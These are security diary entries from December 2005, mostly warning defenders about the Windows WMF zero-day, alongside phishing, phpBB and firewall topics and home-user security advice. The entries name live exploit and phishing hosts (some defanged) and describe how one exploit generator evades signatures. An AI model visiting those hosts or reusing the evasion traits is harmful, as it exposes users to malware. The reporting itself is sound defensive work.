Published: 2005-12-31

* New exploit released for the WMF vulnerability - YELLOW

On New Year's eve the defenders got a 'nice' present from the full disclosure community.

The source code claims to be made by the folks at metasploit and xforce, together with a anonymous source.
The exploit generates files:
  • with a random size;
  • no .wmf extension, (.jpg), but could be any other image extension actually;
  • a random piece of junk in front of the bad call; carefully crafted to be larger than the MTU on an ethernet network;
  • a number of possible calls to run the exploit are listed in the source;
  • a random trailer
From a number of scans we did through virustotal, we can safely conclude there is currently no anti-virus signature working for it. Similarly it is very unlikely any of the current IDS signatures work for it.

Judging from the source code, it will likely be difficult to develop very effective signatures due to the structures of the WMF files.

Wishing all windows machines a happy New Year, with a bit fewer nasty exploits.

Considering this upsets all defenses people have in place we voted to go to yellow in order to warn the good guys out there they need to review their defenses.

Swa Frantzen


Published: 2005-12-31

New IM Worm Exploiting WMF Vulnerability

We have received information that a new IM Worm is hitting the Netherlands.  Apparently the worm is spreading with MSN and is spreading with a malformed WMF file called "xmas-2006 FUNNY.jpg".

Kaspersky Lab Blogs

Be very careful when opening the New Years Greetings that you receive folks.  We wouldn't want you to have to spend the rest of your holiday weekend rebuilding your computer.

Thanks to Juha-Matti for providing the information.


Published: 2005-12-31

From extreme to in depth

Warning: some might get offended by some of the initial thoughts in this story. Please read till the end before you vent the frustration.

I'm also not trying to bash on Microsoft. If I were I'd have borrowed a subject of some spam message I got recently: "forget microsoft, get big and hard". I'm just trying to show how you can come from an extreme reasoning to a workable solution to protect those assets that need protection.

Suppose you defend a place that has high to very high security needs and wants to avoid the wmf thing at all cost. Reasons to do this should be based on a risk assessment, but elements that might lead to such extreme conditions might include:
  • No patch in sight from Microsoft
  • Not wanting to infect peers such as customers
  • Not wanting to rely on anti-virus signatures when people are developing versions of the exploit with a highly random nature
  • Not wanting to rely on IDS devices due to the same randomness and the "it's too late already" aspect
Suppose you are basically just not capable of accepting the risk associated with the WMF vulnerability, almost no matter what you break. In such a case you have big avenues to walk:
  • Ban Microsoft products in your environment
    • I told you we were going to start from the extreme viewpoint, so hold your horses.
    • What does it buy?
      • No windows, no windows WMF vulnerability
    • What does it not buy?
      • You still can pass on dangerous payload to others like to your customers.
      • If a single escaped machine remains or a single machine snuck back in, you still might get affected.
  • Ban all communication and/or file exchanges
    • Extreme again isn't it? Moreover it is perceived very hard in a modern world.
    • What does it buy you?
      • You prevent yourself from getting and giving dangerous payload to all peers
    • What does it not buy you?
      • If a single file would sneak in, or be present already, you might still have a major problem
      • You have sacrificed a lot of the availability to gain confidentiality and or integrity
With those extreme paths in mind, think about what it can do for you, which parts can help you in your setup and  with your risk assessment help.

Most of our readers do not have the extreme "at all cost" risk situations.

Most of us have a situation where we have a business, and the business must continue to operate. In such a business however you will identify  -if you look for it- areas that might need more protection and are willing to sacrifice more for that protection than other parts of the same business.  That difference in need for protection is what you can play on to do something.

E.g.: Suppose I know the accounting department was considered sensitive and due to the risk analysis performed, worthy of more extreme measures then other departments.

What could I try to do to use some of the very extreme ideas and build a safer solution for them now and in the next weeks ?
  • Isolate them frmm the rest of the company. Plug a firewall between them and the rest of the internal networks. Disallow all unneeded communication with the rest of the company, making sure their servers are on their new inside.
  • Use advanced networking solutions to prevent (accidental) hookup of unauthorized equipment to the sensitive network. E.g.:
    • Make sure switch ports automatically shut down when try try to learn a second MAC address
    • Assign only DHCP addresses to known MAC addresses
    • Kick unknown MAC addresses into a separate VLAN
    • Use layer 2 measures (such as private VLANs) to prevent client-to-client communication
  • Disallow dangerous usage:
    • Disallow IM
    • Disallow web surfing
    • Disallow email, or strip all attachments from the more secure email server they get access to.
  • Now no surfing, no email, ... etc can be hard on the users and they might have really good arguments to have the functionality back.
    • Build a second less sensitive network on different infrastructure
    • Add machines for those that need the web/email/...
    • Allow them to surf the web (with traditional restrctions) on those "less" secure machines but not on the "sensitive" machines which are to be used exclusively for their sensitive application(s).
    • Be very procedural and build the needed infrastructure if you want to allow transfers between the two environments.
  • The more traditional stuff should not be forgotten, especially not on the more secure side:
    • Take a tough stance on updating Anti-virus signatures
    • Look for unregistering the DLL as per Microsofts suggestion
    • May be consider an unofficial patch from some reputable source
  • Look for other platforms
    • This is hard as training users to switch platforms takes time, and worse applications might not have clients for other platforms that work properly. Still it's one way out of the de-facto monoculture of operating systems and related vulnerabilities. We know from agriculture monoculture has risks. If we want not to accept the risks we need to act on it as well.
  • Look for other strongholds to build
    • If you have more than one sensitive section in you company, build more of these strongholds, do not build larger ones.
    • More smaller ones will contain the spread of infections and the associated risks and costs in clean up better under control.
So basically I'm back to a very in depth security approach that when compared to medieval defenses is the equivalent of not trying to build a city with a huge wall around it, because it's too much of a hassle and too costly. But instead trying to build a city with a somewhat flimsy wooden palisade and build for the few nobles we have a big sturdy donjon to protect them, even at the cost of some discomfort in the process.
Add to that that families of nobles get their own donjon so as not to risk all nobles getting wiped out in one go should disease strike the city.

Swa Frantzen


Published: 2005-12-31

2006 Predictions

 On December 27th I asked for predictions for 2006.  Here is what we got.  Many thanks to all of you that responded.  Now let's see how close these guys are.

From Dan:

You asked for them...


 Below is a list of some of the topics we may be seeing in the New Year:

*Web-born worms

 Not a lot of these around yet. Myspace and some other online sites were infected, but with the mass amounts of exploits for Web scripting languages and un-patched machines this is bound to happen.

 * RSS malcode

 Great technology. As more browsers embed this and include exploits,  the frequent / unattended nature of RSS will be used to infect.

* Trojans outpace worms

 We already are starting to see this. New Trojans and variants of Trojans are coming out daily in volume.

 * Voice-over-IP Phishing (Vishing )

 Somebody had to come up with another name :-). Using Voice over the Internet could introduce another means to deceive unsuspecting users to do something they should not be.

 * Toxic Blogs

 Yes, blogs are everywhere. Including here. Fact is that most of them do not check for scrupulous scripting, scan their file posts, and allow active content in posts.

 * Xbot 360

 The Xbox connecting over the Internet for updates and other things leads me to believe that this will simply be another way for attackers to use your PC and your connection at home for their own purposes.

 * Cross Site scripting attacks

 High-profile ecommerce and financial websites have had (and will have cross site scripting vulnerabilities). Attackers will leverage these for Phishing , Trojan Downloader's and for other nefarios reasons more frequently.

From Jeremy:

I believe that one of the biggest threats are going to be insecure databases.   The proof of concept database worm that was released about a month or so ago is just the very beginning of what we will see over the next year+.  To me this is a very real problem as I have audited environments where there was a huge focus on securing hosts and servers, but zero or minimal focus on securing the database.

From Jim:

My 2006 predictions/paranoid phobias:

  1. "Zero-Day" exploits that are discovered and exploited by The Bad Guys, with no one being the wiser until it is far, far too late; 2. Tightly-targeted malware (currently being used) that, once it gleans information from financial institutions, allows the attacker(s) to then completely trash the entire information store - causing panic/chaos (if only for the targeted company(s); 3. Hackers taking the Fed's recent announcement that "the Internet is not vulnerable to widespread attack" as a personal challenge.
Again - thanks to the contributers.


Published: 2005-12-31

Leap Second

Just a reminder that tonight is one of those special times that we see some strange things.  One of those things is the fact that 12-31-2005 23:59:60 UTC is not the same as 01-01-2006 00:00:00 UTC (and it is just before midnight UTC that the leap second will be inserted), but most OSes can't handle a 61 second minute.  So when reviewing your logs next Tuesday morning remember to cross reference the times.  If you use NTP to sync machine times, your clock should gradually adjust back to the correct time and you'll probably never notice.


Published: 2005-12-31

NOT a Quiet Day

On December 27th when I did the diary I commented on how quiet it had been.  Well it appears the quiet ended and I perhaps jinxed us.  The question is - how many of the new computers out of the box and connected to the Net have been fully updated, patched and AV protected?  How many new computers are being protected by a firewall of some type?

I purchased new computers for my grown, married children and their families for Christmas.  They each had really old hand me downs and it was time to get them up to date.  My daughter and her husband didn't even have an email address of their own, they came to my house and used mine.  So for Christmas I decided to give their families something they could really use. 

Before those machines even made it under the tree - they were completely updated.  (That is what I spent late Christmas Eve doing). I installed a software firewall program and antivirus program on them as well as AdAware and Spybot. I uninstalled all of the junk programs that the vendor had put on the machines (Kazaa Lite, etc...). Their email was setup and all of the updates were done.  They have been instructed on running scans and making sure that the live update is running. I have instructed them on what not to do (open unsolicited emails, click on links or attachments from unsolicited emails), don't download, stay out of chat rooms, etc.....

I contacted them yesterday and reminded them not to open ANY attachments or links in any email that they were not specifically expecting. And to stay out of the IM's.

Here is hoping that this will keep them safe for the next few days.  How about you?  Have you adequately protected your computer? Do you have a current AV program that has updated defs?  Do you have a firewall?

Have a Happy New Year everyone.


Published: 2005-12-31

WMF and Indexing

WMF Indexing, White Elephants and White Rabbits

The WMF White Elephant in the room as far as I'm concerned is Indexing. YMMV. How many Vendors have other Indexing services installed that are going to automagically enable WMF exploitation on or across your network?

 F-Secure pointed out the White Elephant when they recommended you "disable indexing of media files (or get rid of Google Desktop) if you're handling infected files under Windows" and  said "This is enough to invoke the exploit and infect the machine. This all happens in realtime as Google Desktop contains a file system filter and will index new files in realtime.". And I agree, turn all Indexing off until a fix is out.

Microsoft, Google and other vendors should immediately address what the role is of their indexing services, particularly as it relates to shares, synchronization and potential mitigation activities. Their lack of comment on this issue is glaring.

MS Indexing (White Rabbit Link)

F-Secure's blog today has a new vulnerability workaround (unrelated to indexing).


Published: 2005-12-31

Call 1-866-727-2338 for free virus and security-related support from Microsoft

 Preparation for the Inevitable (and New Years Resolution?)

When your Family and friends inevitably ask for help to "clean" their systems exploited by malicious WMF (or other) attacks, refer them to MS's free phone support.

Microsoft's No-Charge support phone number for virus and other security-related issue support is 1-866-727-2338, and "is available 24 hours a day for the U.S. and Canada."

"Outside of the U.S. and Canada", click here and then select your region to obtain the free support phone number for virus and other security-related issue.


Published: 2005-12-30

Ethereal Security Issue

While catching up on email from the past week, I noticed a security issue that has fallen by the wayside in the midst of all of the 0-day exploit discussion.  On Tuesday, Ethereal released a security advisory which discusses problems with 3 of its dissectors.  Of particular note is the IRC dissector can go into an infinite loop.  As you, our loyal readers, have probably already noted mentally, the IRC dissector is a fairly important one as we eavesdrop on botnets that primarily use irc as its command and control channel.

It is possible that one could run arbitrary code through the vulnerability with the OSPF dissector, but more likely you will just have Ethereal crash or use up all available system resources.

The new version is available at http://www.ethereal.com/download.html .

Scott Fendley
Handler on Duty


Published: 2005-12-30

phpBB 2.0.19 released

phpBB 2.0.19 has been released.

It looks like it's upgrade time for those of us running a phpBB forum. XSS and dictionary attacks against forum users seem to be on the menu.

Stay tuned for more details.

Swa Frantzen


Published: 2005-12-30

Musings and More WMF Information

Websense released some more information about their investigation in some website exploitation that involves IFRAMEs and WMF vulnerability.  My fellow handler Lorna said recently, "IFrames are always suspect in my eyes."  In light of this information, I have to agree with her.  Take a look at Websense Security Labs website for  details of their investigation including a nice movie file showing the exploitation at work.

As a side note,  I am quite thankful that most university and K-12 schools are still on holiday until next week.  This will hopefully give enough lead time for the mass media to report on this issue, and maybe, just maybe, Microsoft will have a better solution for the home users and our student populations.  *crossing his fingers that MS will release a preliminary update quickly*

One reader send us the following summary, which pretty nicely outlines the issues with this vulnerability:

  1. Filename extension filtering will not work.
  2. Even if you un-register the DLL, some programs may re-register it by invoiking it (shimgvw.dll) directly.
  3. you have to delete or rename the DLL to protect yourself. However, remember to undo this once there is a patch.
  4. While images embedded into docuements may not immediately trigger the exploit, they may once saved into their own file.
The readers goes on to note that whatever mitigation is offered in Microsoft's advisory is not much more then a quick temporary bandaid. What we need is a patch and we need it quick.

Scott Fendley
Handler on Duty


Published: 2005-12-30

Lotus Notes Vulnerable to WMF 0-Day Exploit

John Herron at NIST.org discovered today that Lotus Notes versions 6.x and 
higher is vulnerable to the WMF 0-day exploit. In the advisory, located
on the NIST website here, John reports that Lotus Notes remained vulerable
even after running the regsvr32 workaround in the Microsoft security advisory.


Published: 2005-12-30

More WMF Signatures

Frank Knobbe from bleedingsnort.com sent us some new and improved rules for the WMF exploit. As you can tell by the various itterations we went through, a lot of work went into these rules.

First a couple notes about these rules:

In its simplest case, you may want to limit the rules to port 80 (or $HTTP_PORTS, which typically maps to ports used by web servers).  But realize, that this only works if you block access to other ports at your firewall. Otherwise, its trivial to just run a web server on an odd port, and link to the image on the odd port.

Here the rule developed by the Bleedingsnort team:
(to avoid copy/paste issues, see the bleedingsnort CVS repository


Published: 2005-12-29

Resolution(s) For The New Year

As the end of the year is often a time of reflection, let me take a moment to put aside the technical nature of what we all do and offer some of my recent thoughts.

I'll be the first to admit, there are things I can do much better than I have been and I'd wager that most people reading this believe there is at least one security related thing that they can do better as well.

If you have not already done so, take a few moments to think about what you could do better.  We all understand the realities of budgets, office politics and the other factors we often complain about daily and lay blame on for an inability to do [insert whatever here], and we understand that many things will not change despite how much we wish them to.

Think of one thing that you can (realistically) do better next year to make the systems you are responsible for safer, more secure and just as usable and then make a plan to make it happen.

You don't have to send your resolutions in to us, but at some point next year, I'll put the question to you as to whether you kept your resolution or not.

If you insist on sharing, or want to send your resolution to someone thinking that you might be more inclined to keep it if someone else knows, send them to me at isc dot chris at gee mail dot com.  If I have enough and see any patterns emerge I'll write about it when I am again on duty next month.


Published: 2005-12-29

* Back to Green

As it has been 24 hours since we elevated the Infocon to yellow in response to the WMF 0-day exploit, we will be lowering the Infocon level to Green

An advisory has been released by Microsoft, working snort signatures are available and as a result of raising the Infocon to yellow yesterday, awareness of the issue has been raised appropriately.

Moving to green signifies that no -new- significant threats are currently being tracked and is not intended to imply that the threat level today is any less than it was yesterday. See Infocon Levels for more information.  Administrators and others responsible for system security are encouraged to act appropriately if no action or incomplete actions have been taken at this time.


Published: 2005-12-29

Bleeding Snort Sigs Available

Snort sigs to detect the WMF exploit are available at Bleeding-Edge Snort

Thanks Matt, Frank and everyone else who has submitted signatures!


Published: 2005-12-29

Microsoft Advisory

Microsoft has issued a security advisory on the WMF vulnerability.

Details are available here


Published: 2005-12-29

* Update on Windows WMF 0-day

From Daniel's diary entry yesterday ...

Update 19:07 UTC
: We are moving to Infocon Yellow for a bit. There has been some debate among the handlers about this step, but considering that a lot of people are on holidays and might otherwise miss the WMF 0-day problem, we have decided to raise the alert level.

The folks at Websense Labs have a nice movie on how it looks like if a system gets exploited by this WMF 0-day, see http://www.websensesecuritylabs.com/images/alerts/wmf-movie.wmv . Don't go to any of the URLs visible in the movie unless you know what you are doing (or feel like spending the next hours reinstalling your PC).

The orignal exploit site (unionseek.com) is no longer up. But the exploit is being served from various sites all over by now, see the F-Secure Blog on http://www.f-secure.com/weblog/ for an update on the versions of the exploit found in the wild.

Working exploit code is widely available, and has also been published by FRSIRT and the Metasploit Framework.

Regarding DEP (Data Execution Protection) of XPSP2, the default settings of DEP will not prevent this exploit from working. Comments we have received in the meantime suggest that if you enable DEP to cover all programs (as documented on Microsoft Technet ), the WMF exploit attempt will result in a warning and not run on its own. Don't feel too safe though, we have also received comments stating that a fully enabled DEP did not do anything good in their case.

While the original exploit only refered to the Microsoft Picture and Fax Viewer, current information is that any application which automatically displays or renders WMF files is vulnerable to the problem. This includes Google Desktop, if the indexing function finds one of the exploit WMFs on the local hard drive - see the F-Secure Weblog mentioned above for details.

Update 23:00 UTC:  The vulnerability seems to be within SHIMGVW.DLL.  Unregistering this DLL  (type REGSVR32 /U SHIMGVW.DLL at the command prompt or in the "Start->Run" Window, then reboot) will resolve most of the vulnerability, but will also break your Windows "Picture and Fax Viewer", as well as any ability of programs like "Paint" and "Explorer" to display thumbnails of any picture and real (benign) WMF files.

Update 23:19 UTC: Not that we didn't have enough "good" news already, but if you are relying on perimeter filters to block files with WMF extension from reaching your browser, you might have a surprise waiting for you. Windows XP will detect and process a WMF file based on its content ("magic bytes") and not rely on the extension alone, which means that a WMF sailing in disguise with a different extension might still be able to get you.


Published: 2005-12-29

* Windows WMF 0-day exploit in the wild

From Daniel's diary entry yesterday ...

Just when we thought that this will be another slow day, a link to a working unpatched exploit in, what looks like Windows Graphics Rendering Engine, has been posted to Bugtraq.

The posted URL is   [ uni on seek. com/   d/t    1/  wmf_exp.  htm ]
(DON'T GO HERE UNLESS YOU KNOW WHAT YOU'RE DOING. Added spaces to avoid accidental clicking. See Firefox note below!!)

The HTML file runs another WMF (Windows Meta File) which executes a trojan dropper on a fully patched Windows XP SP2 machine. The dropper will then download Winhound, a fake anti-spyware/virus program which asks user to purchase a registered version of software in order to remove the reported threats.

During the test Johannes ran, it was interesting that the DEP (Data Execution Prevention) on his system stopped this from working. However, as this was tested on a AMD64 machine, we still have to confirm whether (or not) the software DEP also stops this - let us know if you tested this.

Internet Explorer will automatically launch the "Windows Picture and Fax Viewer".  Note that Firefox users are not totally imune either. In my install of Firefox, a dialog box will ask me if I would like to load the image in "Windows Picture and Fax Viewer". If I allow this to happen ("pictures are safe after all" NOT!), the exploit will execute.

UPDATE - According to F-Secure's blog "Firefox users can get infected if they decide to run or download the image file."

For more information, see also http://secunia.com/advisories/18255/  http://vil.mcafeesecurity.com/vil/content/v_137760.htm and http://www.securityfocus.com/bid/16074/info


Published: 2005-12-28

The most hated IP address of 2005 ?

Time for a little hall of shame. Is there any IP address range or individual IP address that was annoying the daylight out of you in 2005?  An address where you tried and tried to contact the ISP to have a malware, botnet controller, exploit page removed, but to no avail? Where exploits kept coming back again and again ?  Let us know, and we might share your story.  For starters, here is mine:

Most Hated Netblock:195.225.176.x - 195.225.177.x  (AS31159)
Provider: Netcathost, Kiev, Ukraine
Reason for claim to fame: Hosting exploits, browser hijackers and CoolWebSearch related annoyances since several months. Ignoring, bouncing, or rejecting any complaints to the abuse contacts.

Update: beehappyy.biz is being implicated in the currently ongoing WMF 0-day exploit mania. And guess what beehappyy.biz resolves to ? - my favorite netblock again. Null-Routing, anyone?


Published: 2005-12-28

Searching money, finding exploit

Every now and then, when using completely benign search terms in Google and others, the results that come out on top range from "not nice" to "outright hostile". We've received a report from a user who was looking for "money", and what he got presented with was a link to hxxp://hyipgoldinvest.com (dont click). The site is booby-trapped with an exploit variant of MS05-054 that is not yet detected by AV.  Conclusion: Careful what you click on. An URL returned by a search engine is not necessarily more trustworthy than one that you receive in a spam message that offers "che ap replcia wathces".


Published: 2005-12-28

Possible IM attack gearing up.

We have received a few emails today advising us that users are receiving popups while on IM.  These emails try to convince you to click on a link that is purported to be MyPictures. It apparently attempts to install a version of SDBot.

Remember - Don't click on links in IM - ever.  A dog is not a dog in IM.  And Aunt Sally probably is not really Aunt Sally.


Published: 2005-12-27

Handlers On Duty

Today Donald and I are tag teaming as Handler On Duty, so you are likely to see stories with a wide range of topics. Thanks Donald for tag teaming with me today.


Published: 2005-12-27

What will 2006 have in store?

Well, 2005 is soon to come to a close.  What a tremendous year this has been!  We have had lots of exciting discussions about everything from "soup to nuts".  Looking back we have seen new exploits, new holes in the Internet and the usual round of viruses and worms.  I was the Handler On Duty - New Years Eve 2004 and asked our readers who checked in with us to tell us what they thought 2005 was going to bring. Here is a recap of some of the responses that were received:

From Greg:
   With the developing trends in botnets and denial of service with them, I'm willing to bet that we'll see more    
    frequent use of ddos for hire and malware distribution by zombie pcs. It also would be a shock to see an
    adaptive botnet..that can change and adapt to discovery on the fly..shutting down discovered nodes and such.

From John:
    As direct electronic invoicing becomes more popular, crimals will try to leverage poor implementations of
    Web Services to submit fraudulent invoices for payment. Agencies that have done away with support staff
     necessary for manual invoice processing will pay dearly.

From David:
    I can't think of a new 'technical' threat but the existing technology joy-ride hackers are using could end up
    being more dangerous in the near future. Currently when we find a hacked system it is normally being used to 
    share copyrighted music, movies or applications.  They mainly want to use our disk space and bandwidth and
    have no dangerous agenda.  This could change in the future, however.  As financial institutions tighten up
    security the money motivated hackers may turn to using BotNets to harvest documents.  Instead of hijacking a
    system to use the disk space and setup detectable FTP servers they may end up harvesting all of the documents
    from the system in hopes of gaining financial or personal information for identity theft. Pretty scary to even think
    about it.

From Jack:
    DNS Poisoning/Hijacking

From Anonymous:
    Just thought I'd add some of the potential issues that we might start seeing in 2005. First, is the spread of bots
    to IP enabled devices. Once more as devices reach that "on-line all the time" state, the vulnerabilities will be 
    exploited more. This could include a range of devices from cellular phones, to even the next generation console
    systems. (Note: viruses and exploits for console systems may deserve to be its own potential issue). Second, an
    increase of malware for alternative operating systems (non-Windows), primarily for the Tiger OS. Third, IPv6
    will become wider spread, and while it will be a partial remedy for some sercurity issues; improper
    implementation will create added security risks and issues -- primarily in the areas of content
    management/filtering, simpler facilitation of cryptographic malware, and brand new vulnerabilities for IPv6
    enabled products.

So what do you think?  How did our predictors do for 2005?  What do you think were the biggest issues for 2005? I will be the Handler On Duty on News Years Eve and will print some of the responses we receive.

What are your predictions for 2006?  Let us know. Your response could be used in a Diary next year.


Published: 2005-12-27

Quiet Weekend - not much news

It has been a very quiet weekend so not much exciting news.  Perhaps all of the script kiddies got new computers for Christmas and haven't gotten them fully up to speed yet.  Or perhaps many of there rogue machines were also replaced by new ones this year and they will have to go out and rebuild their army.  At any rate, whichever is the case, we here at the Storm Center appreciate the break.


Published: 2005-12-26

Evolutions in the honeypot/honeynet arena

Over the past days we have received some interesting links on the collection of malware using new variations on the honeypot theme.

Traditionally a honeypot was a (somewhat) vulnerable system that you let get infected in order to learn something form it. This newer breed is more an an automated system to catch malware without getting the system infected.

mwcollect (http://www.mwcollect.org/) is an automated downloader of malware. Georg Wicherski, mwcollect head developer, sent us some collected samples of his setup and I must say I'm still impressed by the number of collections he's sent us then.

Along the same lines is nepenthes (http://nepenthes.sourceforge.net/) a system that emulates known vulnerabilities in order to catch the exploits thrown at it.

Fellow handler Daniel Wesemann suggested a look at the Argos system, (http://www.few.vu.nl/~porto/argos/), designed to detect arbitrary control flow and arbitrary code execution attacks. It is build on top of QEMU for the emulation of x86 processors.  I have one big gripe about the approach and that is the comment in the FAQ of QEMU (quoting):
Q: "I want to set up a honeypot. Can I use QEMU for that purpose ?"
A: "It is possible, but the QEMU code has not been reviewed for security issues."

With recent vulnerabilities in the commonly used vmware and the trend of malware detecting vmware and debugging, great care is needed to the quality and security of these tools. So my suggestion would be to carefully inspect the source code of any of these before deciding to deploy it, even for a test run.

There are for sure more efforts in this arena, I'm just summarizing what we received recently.
As always, use these systems at your own risk.

Collecting all these samples is however just the first step. Somebody needs to analyze it and with the increase of malware that race might be tough on some. See also Kevin Liston's on Dasher article.

Swa Frantzen


Published: 2005-12-26

Silent Drop vs Reject Firewall rules

We received several comments about firewall rules and silently dropping packets vs. sending the correct icmp or TCP reset codes. While it violates some rfc's silent drop is my standard recommendation.
Some might ask why I choose silent drop. I will explain but first a few questions.

What does it help if the firewall sends notification of traffic it rejects?

Why tell the bad guy what you're blocking? (And what your not blocking).

Which good guy is permitted to scan my systems for open ports or protocols?

1: Silent drop prevents some reflective attacks.
In some cases the source address of the attack victim is spoofed. The desire is to cause firewalls, routers and other systems to send traffic back against the spoofed source.

2: Silent drop prevents reverse mapping.
In other cases by sending back a "port closed" type message your firewall can be negatively mapped. (e.g Denied 1-1024 except 22, 23, 25,...). That is how nmap udp port scan and protocol scan work. They basically assume a port or protocol is open unless they get a message stating its closed.

3: Silent drop might not be effective, as a reject might never reach the intended target.
With the recently discovered blind TCP resets via forged icmp errors the rfc's governing some of these reactions will probably be changed. Gont the author of the vulnerability suggested a larger amount of the original packet be returned with the icmp error packet. In the mean time one of the primary mitigations for this issue is to ignore the first few icmp errors that could cause a reset. Many networks blocked some incoming icmp error messeges as a result of that vulnerability.

I personally require silent drop (no icmp, no TCP resets) as a standard feature from firewalls and other filtering devices.

The jury is still out on the "correct" thing to do but if a firewall or filtering devices doesn't support silent drop I would not buy it or recommend it. It should be an option the end user can choose.

Additional comments were contributed by fellow handler Swa Frantzen and Johannes Ulrich respectively
"I try to build "drop" to the "bad" side and reject to the "good" side. Good
and bad might not always be in and outside. I permit the
network admin stations to initiate traceroute and icmp echoes,
in order to not have the reaction "it's the firewall" all over the place when the firewall is working as intended."

One reason to have internal reject rules that prevent systems from 'calling out' but send correct error report: is rejects make it easier to debug issues. In these cases its more about mistakes then malicious users.



Published: 2005-12-26

Phishing: Saudi style

On a very slow day the majority of the messages that reached us were about phishing. It consisted of the usual phishing for ebay, amazon, ... accounts, but one jumped up that was somewhat unusual:

Suliman brought a phishing attempt to our attention that was written in Arab aiming at a bank out there and diverting the clicks to http://www_sambaonlineaccess_com/ instead of the bank's http://www.samba.com/ normal address. According to the submitter -I can't read Arab- it was linked to an online registration of a large IPO for a chemical company.

Aside of the IPO relation, it was also noteworthy because of the language used (Arab) and of the location of the server where the clicks were directed to: Israel. I cannot help to note that at the very least this is quite provocative.

The website supposedly collecting the information wasn't responding at time I tried to look at it, which might be a good sign after all.

The lesson for the end users remains the same: never follow links you get in email. If possible turn off the rendering of HTML for email, it's a serious risk from a security perspective.

The warning for those of us fighting abuse is also clear.
  • Some attacks might aim at very shortlived events.
  • You won't be able to understand it all, so you will have to make sure you have processes in place that can deal with language in abuse complaints you can't understand yourself.

Swa Frantzen


Published: 2005-12-25

Observations on the Family System Administrator

Some observations from http://isc.sans.org/diary.php?storyid=960:

  • 8% suggested the use of a hardware router
  • 8% suggested that Linux was the answer for their parents
  • 11% thought that Macs were a safer option
  • 19% were willing to enter a lifetime support contract for their parents
  • 19% thought that their parents couldn't handle a computer
  • 25% of the submitters chose to send their suggestions anonymously


Published: 2005-12-25

RFC2142 is a two-way street

As Johannes pointed out in http://isc.sans.org/diary.php?storyid=957 RFC2142 is a pretty good RFC to follow.  It works both ways too.

For example, let's say you're running vulnerability scans against your local bank's website and you come across what you think is a very serious vulnerability do you:

a) Jot that IP address down for later use when you need to pay off your credit card debts from the holiday season's over-indulgences.

b) Drop a friendly fact-filled note to abuse@localbank.com


c) Launch a media campaign to publicize the risk encouraging your readers to write letters to the Office of the Comptroller of the Currency

If one supports the idea of Responsible Disclosure the answer would be B, followed by C after an acceptable period of time.


Published: 2005-12-25

A couple of handy iptables tutorials

Harry Hoffman submitted his intro to iptables on Linux servers: http://www.ip-solutions.net/firewall/servers.html

It's a nice little getting-started piece and it starts off with a default-deny policy-- which is one of my personal favorites.

A more advanced treatment on reactive iptables is available here: http://www.sans.org/rr/special/index.php?id=adaptive_firewalls


Published: 2005-12-25

phpBB <= 2.0.17 exploit code in the wild

It's an early holiday gift for phpBB admins all over the world.  Exploit code affecting phpBB version 2.0.17 and previous has been made public.  The targeted vulnerability was announced on Halloween, and updates have been available since then.

I predict we'll be seeing profile.php probes appear in your web logs right along with the awstats and xml-rpc attacks that you've been getting.


Published: 2005-12-24

The Family System Administrator

A couple of days ago we asked our readers, "if your parents got a new computer for Christmas, what would you tell them to do?"  The responses have been great!  Rather than trying to summarize, we decided to just print them all in the order they were received.  If the submitter clicked the box that said it was OK to use their name, we've done so.  Thanks to everybody who sent us their ideas.

Good luck on Christmas morning, everybody!  We know that most of our readers are also family system administrators and this time of year we work overtime.

Best wishes to you and your family from all of us at the Internet Storm Center!

Marcus H. Sachs
Director, SANS Internet Storm Center

From Gary Hinson:

I'd talk them through Bill Cheswick's presentation: "My Dad's Computer, Microsoft, and the Future of Internet Security" at


Merry Christmas to all at SANS.

From Yves Konigshofer:

If it's a new computer, I would tell them to get a wired (not wireless) router at the same time and set up the router with the old computer before connecting the new computer.  That way, windows updates can be installed without having to worry about worms.

In fact, I got my parents a router last year (OK, I also wanted to be able to use my laptop there at the same time) and my father is looking to get a new computer any day now.

It's also important to set up accounts that are not administrator accounts for everyday use.

From John Herron:

If my parents received a new computer for Christmas I would tell them to use Firefox with the Adblock and NoScript extensions.  And if they were ever asked to answer "Yes" or "No" they were to answer "NO" unless they called me first.  The internet is just too dangerous for amateurs unless they follow these steps.

From Pawel Maczka:

We can multiply hundrests of tips but following are essential and minumum list "must have" to protect new Windows box with absolutely minimum cost and effort:
- set strong admin password - use >= 8 characters mix with !"#¤&/) and numbers
- just uncheck "Sharing disks and printers in MS networks" in network connection properties
- agree for firewall and automatic updates
- get Mozilla FF from www.mozilla.com and set as default system browser.
- purchase and install commercial antivirus software
- set password for regular user like admin password
- install an ad/spy-ware freeeware like spybot or lava or just even MS AntiSpyware

From Jafar Calley:

First I would tell them give me a few hours with to to remove Windows and install Linux. Then they can claim a "Cashback" from Microsoft by sending back a rejected licence. :D

Next, my present to them would be free Linux lessons and support for life. As they are complete PC n00bs they wouldn't be able to tell the difference between Linux and Windows, but a little help in using it would go a long way.

Using Linux would also be less frustrating for them as they wouldn't have to worry so much about viruses and spam so they can surf the "interweb net thingy" without worrying. No Spyware either.

Most other stuff like email, writing letters etc.. is straight forward and usually pre-installed with most Linux Distros so after a few lessons, they won't need to keep call ing me back because the computer keeps crashing or they can't do what they want to do.

From Steve K:

If my folks got a Windows PC for Christmas I would explain that it's a very powerful tool - not an appliance, and that they "would only benefit from it if they were to attend a local training course (picked by my good self)", one which covered Windows & broadband security routines.

(Luckily the limit to my father's computing expertise is playing "Missile Command" from MS Arcade and he has no aspirations to further technical savoir faire!)

From Peter Glock:

I'm getting a mac mini for my mum to rig up to her LCD TV.  This will replace an ageing IBM ThinkPad which I'm heartily sick of providing remote support on (she lives 150 miles away). 

She has an existing AOL account for the rare times when she needs to be online which I set up for her some years ago. I foolishly though this would add some additional layer of protection (d'oh).

I'll use the included Apple Remote Desktop to give me VNC access (tunneled over ssh of course) for remote diagnostics, not sure how this will work through the AOL proxy, I will probably have to put a script together to setup a reverse tunnel.  I'll set her up two accounts, a 'normal' one for everday usage plus an admin account for those rare occasions when she needs to install/update something.

The mac firewall will be set to allow only ssh inbound.  I'll setup ClamAV on the mac to scan stuff for malware.

I'm probably going to setup a wifi dial-up access pont (I have an older Apple Airport going spare) so she doesn't have to have a phone lead installed by the TV.  This will be locked down with WPA.

Thinks that's it!

From Gavin:

If my parents got a new omputer for christmas, I'd make sure they had my brother in laws number and go on holiday somewhere with no mobile phone coverage.

From Anonymous:

If my parrents were to get a new computer, I'd take on the role of security elf and intercept it to ensure it would be running still on the Day After Christmas.

Knowing it would most likely be Windows as the OS (beginner's choice), I'd have autoupdate set up, AV with hourly checks and weekly scans, a REAL firewall with updates set up, and a card taped to the monitor with my phone number for emergencies that will occur (new users).

